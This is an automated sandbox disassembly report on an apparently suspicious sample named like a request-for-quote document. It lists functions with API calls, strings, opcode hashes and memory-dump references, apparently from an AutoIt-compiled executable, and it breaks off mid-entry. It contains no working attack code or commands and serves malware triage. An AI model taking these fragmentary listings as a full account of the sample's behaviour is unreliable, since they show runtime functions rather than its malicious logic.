Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
Instruction ID: dec7b0e441c84a99d0ab23afc077d39fee676e6f9a2472c44709d087c22ecc3a
Opcode Fuzzy Hash: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
Instruction Fuzzy Hash: AB71F670601A05BBEB219F54DD49FAABF64FF04314F10022BF615AA2E1D7FA5C10DB5A

Function 004788AB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 004788D7
CoInitialize.OLE32(00000000), ref: 00478904
CoUninitialize.OLE32 ref: 0047890E
GetRunningObjectTable.OLE32(00000000,?), ref: 00478A0E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00478B3B
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00492C0C), ref: 00478B6F
CoGetObject.OLE32(?,00000000,00492C0C,?), ref: 00478B92
SetErrorMode.KERNEL32(00000000), ref: 00478BA5
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00478C25
VariantClear.OLEAUT32(?), ref: 00478C35

Strings

,,I, xrefs: 004788C1

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID: ,,I
API String ID: 2395222682-4163367948
Opcode ID: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
Instruction ID: aabbb54c80bb5556d5779205c7c98f5c8569651e4766cb9ae3be61758569f7e0
Opcode Fuzzy Hash: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
Instruction Fuzzy Hash: 33C138B1604305AFC700DF25C88896BB7E9FF89348F00896EF9899B251DB75ED05CB56

Function 004577DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

_memset.LIBCMT ref: 0045786B
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004578A0
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 004578BC
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 004578D8
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00457902
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0045792A
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00457935
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0045793A

Strings

\CLSID, xrefs: 00457822
SOFTWARE\Classes\, xrefs: 0045780C
\IPC$, xrefs: 00457882

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: 77803e0cf30d0c6a9af00fa7a29df62c406b8a667e1daf005490fda91c829b3b
Instruction ID: bd842348e8c291230e2108f9814d7b32575dde29d3ae902d03d2cd9f0e66d559
Opcode Fuzzy Hash: 77803e0cf30d0c6a9af00fa7a29df62c406b8a667e1daf005490fda91c829b3b
Instruction Fuzzy Hash: 3F41FB72C14129AADF11EBA5DC85DEEB778FF04314F40447AE905B22A1DB396D08CBA8

Function 00480E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31

Strings

HKEY_LOCAL_MACHINE, xrefs: 00480E9A
HKCC, xrefs: 00480EFF
HKLM, xrefs: 00480EAF
HKEY_CURRENT_USER, xrefs: 00480F10
HKEY_CLASSES_ROOT, xrefs: 00480EC4
HKEY_USERS, xrefs: 00480F32
HKU, xrefs: 00480F43
HKEY_CURRENT_CONFIG, xrefs: 00480EEE
HKCR, xrefs: 00480ED9
HKCU, xrefs: 00480F21

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: a4df75a5d1017b7a8f535d2451c159b81df183318fde1907aaf5dc5abb7e2787
Instruction ID: 987af29362f030b9785e67816bde092fa47ad23058dcaf1b7a905610e89cab94
Opcode Fuzzy Hash: a4df75a5d1017b7a8f535d2451c159b81df183318fde1907aaf5dc5abb7e2787
Instruction Fuzzy Hash: 3C4183312142598BCF60FF11D891AEF3760AF21308F94882BFE5517292D77C9D1ACB69

Function 0045F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0043E2A0,00000010,?,Bad directive syntax error,0048F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0045F7C2
LoadStringW.USER32(00000000,?,0043E2A0,00000010), ref: 0045F7C9

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

_wprintf.LIBCMT ref: 0045F7FC
__swprintf.LIBCMT ref: 0045F81E
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0045F88D

Strings

Error: , xrefs: 0045F85B
Line %d:, xrefs: 0045F818
Line %d (File "%s"):, xrefs: 0045F833
., xrefs: 0045F873
%s (%d) : ==> %s.: %s %s, xrefs: 0045F7F7

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: 74a0cc194ac09de34fdd2a92ff6b81e5f28cce098f0882cecbc7bf7357ad898b
Instruction ID: b323f88afb297f8589dfe01482fd0210897c7bceeb753686804773940a61526b
Opcode Fuzzy Hash: 74a0cc194ac09de34fdd2a92ff6b81e5f28cce098f0882cecbc7bf7357ad898b
Instruction Fuzzy Hash: 33215071904219BBCF11EF91CC0AEEE7739BF14309F04087BB515750A2EA39AA18DB59

Function 004652C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

Part of subcall function 00407924: _memmove.LIBCMT ref: 004079AD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00465330
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00465346
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00465357
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00465369
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0046537A

Strings

close PlayMe, xrefs: 00465341, 0046536E
alias PlayMe, xrefs: 00465309
open , xrefs: 004652DF
play PlayMe, xrefs: 00465375
status PlayMe mode, xrefs: 0046532B
play PlayMe wait, xrefs: 00465364

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
Instruction ID: 2e8e5f898991f968bbba2f693440f846553d5b5edaf37d24830f39f112612e90
Opcode Fuzzy Hash: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
Instruction Fuzzy Hash: CE119370D5015979D720B662CC49EFF7B7CEB91B48F10042F7801A21D1EDB81D45C6BA

Function 004646B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 004646D2
gethostname.WSOCK32(?,00000100), ref: 004646EC
gethostbyname.WSOCK32(?), ref: 004646F9
_wcscpy.LIBCMT ref: 00464721
_memmove.LIBCMT ref: 00464734
inet_ntoa.WSOCK32(?), ref: 0046473F
_strcat.LIBCMT ref: 0046474D
_wcscpy.LIBCMT ref: 00464764
WSACleanup.WSOCK32 ref: 00464772
_wcscpy.LIBCMT ref: 00464780

Strings

0.0.0.0, xrefs: 0046471B

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: cbe6a9854f2a8758ac6b0ec3204168094a3fc6117155a8b4d2da0760867b373f
Instruction ID: ae08325a14d93a890b1fa528d308863361f072a57d3f479d6846efdaae1a579c
Opcode Fuzzy Hash: cbe6a9854f2a8758ac6b0ec3204168094a3fc6117155a8b4d2da0760867b373f
Instruction Fuzzy Hash: BD11F331600114AFDB10AB70AC46EDE77ACEB41716F5405BFF44592191FF7889858B5A

Function 00464F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00464F7A

Part of subcall function 0042049F: timeGetTime.WINMM(?,75A4B400,00410E7B), ref: 004204A3

Sleep.KERNEL32(0000000A), ref: 00464FA6
EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00464FCA
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00464FEC
SetActiveWindow.USER32 ref: 0046500B
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00465019
SendMessageW.USER32(00000010,00000000,00000000), ref: 00465038
Sleep.KERNEL32(000000FA), ref: 00465043
IsWindow.USER32 ref: 0046504F
EndDialog.USER32(00000000), ref: 00465060

Strings

BUTTON, xrefs: 00464FDE

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
Instruction ID: 17ca608856519cd1955488b4f204772d3e00e2da9bda675b1abbe090807247ff
Opcode Fuzzy Hash: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
Instruction Fuzzy Hash: A521A174200605BFEB505F60FC88F2A3BA9EB44749F25543EF102922B1EB758D549B6F

Function 0046D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

CoInitialize.OLE32(00000000), ref: 0046D5EA
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0046D67D
SHGetDesktopFolder.SHELL32(?), ref: 0046D691
CoCreateInstance.OLE32(00492D7C,00000000,00000001,004B8C1C,?), ref: 0046D6DD
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0046D74C
CoTaskMemFree.OLE32(?,?), ref: 0046D7A4
_memset.LIBCMT ref: 0046D7E1
SHBrowseForFolderW.SHELL32(?), ref: 0046D81D
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0046D840
CoTaskMemFree.OLE32(00000000), ref: 0046D847
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0046D87E
CoUninitialize.OLE32(00000001,00000000), ref: 0046D880

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: df310d87e4c66fd61e1bd5e69a727a67aed3a0423001bed2a55539e5496fe644
Instruction ID: f865a34610966cb3ccb6f29414af5a3955dc884533e4df89e7e1a7976a3b9bcc
Opcode Fuzzy Hash: df310d87e4c66fd61e1bd5e69a727a67aed3a0423001bed2a55539e5496fe644
Instruction Fuzzy Hash: 39B11B75A00109AFDB04DFA5C888DAEBBB9FF48314F10846AF909EB261DB34ED45CB55

Function 0045C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0045C283
GetWindowRect.USER32(00000000,?), ref: 0045C295
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0045C2F3
GetDlgItem.USER32(?,00000002), ref: 0045C2FE
GetWindowRect.USER32(00000000,?), ref: 0045C310
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0045C364
GetDlgItem.USER32(?,000003E9), ref: 0045C372
GetWindowRect.USER32(00000000,?), ref: 0045C383
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0045C3C6
GetDlgItem.USER32(?,000003EA), ref: 0045C3D4
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0045C3F1
InvalidateRect.USER32(?,00000000,00000001), ref: 0045C3FE

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
Instruction ID: 11649da17df5d0755d73b9da25d5b781727aa351e01af551b5c423be9c7c6dfa
Opcode Fuzzy Hash: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
Instruction Fuzzy Hash: 62517071B00305AFDB08CFA9DD89AAEBBB6EB88311F14853DF915E7291D7709D448B14

Function 0040201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 004020D3
KillTimer.USER32(-00000001,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0040216E
DestroyAcceleratorTable.USER32(00000000), ref: 0043BCA6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCD7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCEE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BD0A
DeleteObject.GDI32(00000000), ref: 0043BD1C

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
Instruction ID: edfb5b42e1aee2da2af7767ce8276f4fdeab99f29820ea46fc720bac3244b47a
Opcode Fuzzy Hash: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
Instruction Fuzzy Hash: B0617E34101B10DFD735AF14CA48B2A77F1FB44316F50943EE642AAAE0C7B8A891DB99

Function 004021A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC

GetSysColor.USER32(0000000F), ref: 004021D3

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
Instruction ID: b625a7fc61febfd2c935065ad26fa2a4911c749eaed189314b0e0014d1ee1d2c
Opcode Fuzzy Hash: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
Instruction Fuzzy Hash: 0B41E531000100EFDB215F68DC8CBBA3B65EB46331F1442BAFE619A2E1C7758C86DB69

Function 0046A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,0048F910), ref: 0046A90B
GetDriveTypeW.KERNEL32(00000061,004B89A0,00000061), ref: 0046A9D5
_wcscpy.LIBCMT ref: 0046A9FF

Strings

fixed, xrefs: 0046A953
network, xrefs: 0046A969
ramdisk, xrefs: 0046A97F
all, xrefs: 0046A911
cdrom, xrefs: 0046A927
removable, xrefs: 0046A93D
unknown, xrefs: 0046A996

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 75c02351080d399f54f50797f1575012d7efe7bac2141c4c0566531984a89c98
Instruction ID: 63d5a068ad5a56aba220708db6a6aa365c702eef260e2cf9077a2f95fd26ae7a
Opcode Fuzzy Hash: 75c02351080d399f54f50797f1575012d7efe7bac2141c4c0566531984a89c98
Instruction Fuzzy Hash: 6751AE711183009BC700EF15C892AAFB7E5EF94308F544C2FF495672A2EB399D19CA5B

Function 00409837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00409862
__swprintf.LIBCMT ref: 004098AC
__i64tow.LIBCMT ref: 0043F5E6

Strings

True, xrefs: 0043F5A7
%.15g, xrefs: 004098A6
0x%p, xrefs: 0043F5C8
False, xrefs: 0043F5AE

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: __i64tow__itow__swprintf
